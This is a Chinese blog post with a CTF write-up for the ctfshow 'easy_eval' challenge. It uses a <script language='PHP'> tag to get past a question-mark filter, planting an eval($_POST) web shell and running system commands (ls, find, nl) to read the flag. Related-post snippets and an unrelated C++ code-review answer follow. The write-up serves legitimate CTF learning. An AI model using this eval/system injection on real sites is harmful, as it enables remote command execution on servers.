ctfshow:easy_eval

最新推荐文章于 2025-05-08 18:01:47 发布
原创 最新推荐文章于 2025-05-08 18:01:47 发布 · 845 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #开发语言

博客内容讲述了如何在PHP环境中,通过代码注入技术规避问号过滤,使用&lt;script&gt;标签执行PHP代码,例如:`code=<script language='PHP'>eval($_POST[cmd]);</script>&cmd=system('ls')`来获取系统目录信息。通过连续的系统命令如`find`和`nl`,逐步揭示文件内容,最终找到并显示flag。

打开题目看代码

 str_replace()把字符串中某一的字符,换成另一个字符并且区分大小写。

所以存在一个过滤,把问号过滤掉了。

所以常见的<?php  ?>和<? ?>就不可以用了。但是我们还可以用<script></script>

这种php标签可以不用问号。

所以构造语句code=<script language='PHP'>eval($_POST["cmd"]);</script>&cmd=system('ls');

 有回显,可以接着就是查询flag

code=<script language='PHP'>eval($_POST["cmd"]);</script>&cmd=system('find /f*');

最后打开即可 code=<script language='PHP'>eval($_POST["cmd"]);</script>&cmd=system('nl /f*');

 

 

唐飛玉
关注
ctf (easy_eval)
Glacier_Mount的博客
07-02 2248
反序列化、redis
ctfshow新手杯-[easy-eval]
weixin_52116519的博客
10-11 1094
【代码】ctfshow新手杯-[easy-eval]
CTFshow-web入门-命令执行
qq_51439282的博客
10-11 2630
web29 源码为: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:26:48 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GE
『CTF Web复现』[2021 天翼杯]easy_eval
Ho1aAs‘s Blog
09-23 1441
文章目录利用点源码过程分析反序列化绕过wakeupRedis加载恶意so获取shell完 利用点 反序列化绕过wakeup Redis加载恶意so获取shell 源码 <?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code
NSSCTF-WEB-easy_eval
m0_52061428的博客
10-16 1597
说是easy,实际很difficult。
CTF-easy_php
m0_62593857的博客
02-01 775
ctf-easy_php
【Web】CTFSHOW元旦水友赛部分wp_ctfshow元旦水友赛wp
2401_84281629的博客
04-27 1094
这里主要是 ,file://协议支持以file://localhost/etc/hosts的方式访问服务器文件,来绕过开头必须是字母的限制。
2021 天翼杯easy_eval
m0_56059226的博客
10-04 2452
打开环境 <?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; } } class B{ function __destruct(){ echo $this->a-&gt
天翼杯easy_eval复现
weixin_44687621的博客
09-25 1597
最近打了很多比赛,很多题没有做出来。所以决定复现一下某些题目。 本地环境的搭建 本地环境涉及到php的web服务、redis数据库。 Dockerfile的编写 FROM ubuntu:16.04 COPY src/sources.list /etc/apt/sources.list COPY src/redis-4.0.9 /home/redis-4.0.9 RUN apt-get update && \ apt-get install -y curl \
[ CTF ] WriteUp- 20221003 CTFShow新(脑洞)手(套路)杯
热门推荐
ZXW_NUDT的博客
10-07 2万+
CTFShow新(脑洞)手(套路)杯
ctfshow 新手杯 web
shinygod的博客
10-09 888
基础练习
ctfshow解题,知识点学习
Z11762的博客
06-04 1339
,当我们按照pwd排序时,比如 flag用户的密码为flag{123},我们从小到大 一直到f都在他的上面,当我们注册的密码为g时,则出现第一个在下面的。函数可以来读取flag.所以这题主要思路就是构造序列化串利用服务器处理器不同造成的安全问题通过 PHP_SESSION_UPLOAD_PROGRESS来提交我们的序列化串。换句话说,它将用户输入的密码转换为 MD5 散列值,并将该散列值填充到密码输入框中,顺序大致是这样,这时我们就可以判断密码的第一个字符为f,这里还是用python代码比较快,
命令执行(ctfshow
unexpectedthing的博客
11-12 3897
文章目录介绍PHP命令执行的参数${php代码}assertpreg_replace命令执行的几种常用的符号命令执行的基本绕过 介绍 命令执行:一句话就是没有对用户的提交的数据进行过滤,导致通过一些系统命令获取了一些信息。 PHP命令执行的参数 1.system:执行系统命令,会输出 例子:http://www.dvwa.com/cmd/test.php?cmd=||%20ipconfig 2.exec:exec函数不会将执行后的结果输出,与system功能一样 3.passthru:用
ctfshow学习记录-web入门(命令执行69-77&118)
龟速更新的九某人
06-27 1668
ctfshow学习记录-web入门(命令执行web69-77&118)
CTFShow 2022——新手杯wp WEB题目
qq_60878323的博客
10-09 1481
小艾大佬的投稿支持 web AK了
ctfshow__黑盒测试
qq_45655564的博客
07-04 492
web380-测试url参数 一开始什么也没有发现可以注入的地方,于是研究url参数。 发现每个页面都带有参数,如page_1.php,page_2.php啥的。 但是还是没有发现什么问题。 于是看了看别人的wp,发现page.php。 进去之后发现 $id.php很有问题。于是试了一下$id可不可以get传参进去,穿了一个page_1发现可以,于是试了一下另id=flag于是发现了flag web381-找后台 进去之后发现是同样的模板,于是继续查看page.php,结果发现了这个 这个想了想是没
CTF-DAY10
最新发布
orchid_sea的博客
05-08 689
题目描述:请注意,不要以任何方式尝试完全解压该文件,运存被塞满后果自负。请尝试分析该文件。使用WinRAR解压打开。
[天翼杯 2021]esay_eval
ph0ebus的博客
02-05 671
从一道赛题学习Redis主从复制漏洞和反序列化__wakeup()绕过方法
#include "PID_Data.h" #include "math.h" class PIDController { private: PID_BASE PID_base; PID_EXTRA PID_extra; float output; //输出 public: PIDController::PIDController(void); }; class PID_Eval { private: PID_EXTRA PID_extra_eval; public: void PID_Eval::Set_PID_Extra(PID_EXTRA PID_extra); float PID_Eval::PID_Evaluate(PID_BASE PID_base_eval); PID_Eval::PID_Eval(void); }; //PID性能评估 float PID_Eval::PID_Evaluate(PID_BASE PID_base_eval) { int flag = 0; static float TotalPer[TOTAL_MAX] = {0}; static int k = 0; float totalPerformance = 0; float output = (PID_extra_eval.error - PID_extra_eval.lastError) * PID_base_eval.kd + PID_extra_eval.error * PID_base_eval.kp + PID_extra_eval.integral * PID_base_eval.ki; float Ji = 0.999 * abs(PID_extra_eval.error) + 0.001 * pow(output, 2); // 如果误差为负,增加额外惩罚 if(PID_extra_eval.error < 0) Ji += 10 * abs(PID_extra_eval.error); TotalPer[k] = Ji; k = (k + 1) % TOTAL_MAX; for(int i = 0;i < TOTAL_MAX;i++) { totalPerformance += TotalPer[i]; if(TotalPer[i] == 0) flag = 1; } if(flag == 1) totalPerformance = FLT_MAX; return totalPerformance; } void PID_Eval::Set_PID_Extra(PID_EXTRA PID_extra) { PID_extra_eval = PID_extra; } PID_Eval::PID_Eval(void) { PID_extra_eval = {0,0,0,0}; } PIDController::PIDController(void) { PID_base = {0,0,0}; PID_extra = {0,0,0,0}; output = 0; } 可以帮我检查一下这段代码有没有什么语法上的问题吗
03-08
<think>好的,我现在需要帮用户检查一段C++代码的语法问题。首先,我会仔细阅读用户提供的代码,逐行查看是否有明显的错误。 首先,用户提供了两个类:PIDController和PID_Eval。在PIDController的构造函数声明中,使用了PIDController::PIDController(void),这里看起来像是在类内部重复了类名,但实际上在类定义内部,构造函数只需要写构造函数名,不需要加类名和作用域解析运算符。所以这里的写法是错误的,应该改为PIDController(void);。 接下来是PID_Eval类的成员函数声明,同样的问题出现在void PID_Eval::Set_PID_Extra(PID_EXTRA PID_extra);和float PID_Eval::PID_Evaluate(PID_BASE PID_base_eval);。在类定义内部,成员函数的声明不需要加上类名和作用域,直接写返回类型和函数名即可。因此,正确的声明应该是void Set_PID_Extra(PID_EXTRA PID_extra);和float PID_Evaluate(PID_BASE PID_base_eval);。 然后检查成员函数的定义部分。在类外部定义成员函数时,才需要使用类名加作用域解析运算符,比如PID_Eval::PID_Eval(void)是正确的。但用户可能在类内部错误地使用了这种写法,导致重复限定。 接下来,查看变量初始化部分。在构造函数中,用户尝试使用大括号初始化结构体,例如PID_base = {0,0,0};。在C++中,这种初始化方式在C++11及以上是允许的,但如果编译器不支持C++11或更高版本,可能会导致错误。需要确认用户的编译环境是否支持C++11,否则可能需要逐个成员赋值或使用memset等方法来初始化结构体。 另外,检查是否有头文件缺失。代码中使用了float类型和FLT_MAX常量,这需要包含<cfloat>头文件。用户当前的代码中有#include "math.h",但math.h是C标准库的头文件,对应的C++头文件是<cmath>,不过这里主要是FLT_MAX的问题,所以需要添加#include <cfloat>。 在PID_Eval::PID_Evaluate函数中,使用了abs函数和pow函数。math.h中的abs函数适用于整数,而浮点数应使用fabsf。此外,pow函数的返回类型是double,但这里赋值给float类型的Ji,可能存在隐式转换,不过这不是语法错误,但可能导致精度问题。建议使用powf函数代替pow,以保持类型一致。 另外,代码中使用了FLT_MAX,这确实需要包含<cfloat>头文件,否则编译器无法识别,导致编译错误。 最后,检查其他潜在问题,比如变量作用域、静态变量的使用是否合理,以及逻辑错误。例如,TotalPer数组被声明为静态,可能导致多实例共享的问题,但根据代码逻辑,可能是有意为之。此外,flag变量在循环中可能被多次设置为1,但这不影响语法正确性,属于逻辑层面的考虑。 总结一下,主要的语法问题集中在构造函数的声明方式、成员函数的声明方式、头文件缺失以及数学函数的使用上。需要逐一修正这些部分,确保代码符合C++语法规范。</think>检查发现以下语法问题及改进建议,分步说明如下: --- ### **一、构造函数声明问题** ```cpp // 原代码错误示例(类内重复限定) PIDController::PIDController(void); //错误:类内声明不需要类名前缀 PID_Eval::PID_Eval(void); //相同错误 // 正确写法应改为: PIDController(void); //类内声明 PID_Eval(void); //类内声明 ``` **解释**:类内部的成员函数声明无需添加类名前缀,只有类外定义时才需要`ClassName::`。 --- ### **二、成员函数声明冗余限定** ```cpp // 原代码错误示例 void PID_Eval::Set_PID_Extra(PID_EXTRA PID_extra); float PID_Eval::PID_Evaluate(PID_BASE PID_base_eval); // 正确写法应改为类内声明: void Set_PID_Extra(PID_EXTRA PID_extra); float PID_Evaluate(PID_BASE PID_base_eval); ``` --- ### **三、C++11初始化问题** ```cpp // 原代码中的初始化方式依赖C++11标准 PID_base = {0,0,0}; PID_extra = {0,0,0,0}; // 兼容性建议(若编译器不支持C++11): memset(&PID_base, 0, sizeof(PID_base)); //需包含<cstring> memset(&PID_extra, 0, sizeof(PID_extra)); ``` **注意**:若确认使用C++11及以上标准可保留原写法。 --- ### **四、数学函数类型问题** ```cpp // 原代码中的数学函数 abs(PID_extra_eval.error) //错误:abs()对浮点应使用fabsf() pow(output, 2) //返回double类型,赋值给float会有隐式转换 // 修正建议: fabsf(PID_extra_eval.error) //需包含<cmath> powf(output, 2) //直接返回float类型 ``` --- ### **五、头文件缺失** ```cpp // 需添加头文件 #include <cfloat> //FLT_MAX常量定义 #include <cstring> //若使用memset ``` --- ### **完整修正代码片段示例** ```cpp // 添加头文件 #include <cfloat> #include <cmath> class PID_Eval { private: PID_EXTRA PID_extra_eval; public: void Set_PID_Extra(PID_EXTRA PID_extra); //移除冗余类名前缀 float PID_Evaluate(PID_BASE PID_base_eval); PID_Eval(void); //正确构造函数声明 }; // 数学函数修正 float Ji = 0.999f * fabsf(PID_extra_eval.error) + 0.001f * powf(output, 2); ``` --- ### **六、其他潜在改进** 1. **静态数组风险**:`static float TotalPer[TOTAL_MAX]`在多实例场景下会共享数据,建议改为成员变量。 2. **浮点零比较**:`if(TotalPer[i] == 0)`建议用阈值比较(如`fabsf(TotalPer[i]) < 1e-6`)。 --- **总结**:修正上述语法问题后代码可正常编译,逻辑需结合具体场景进一步验证。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值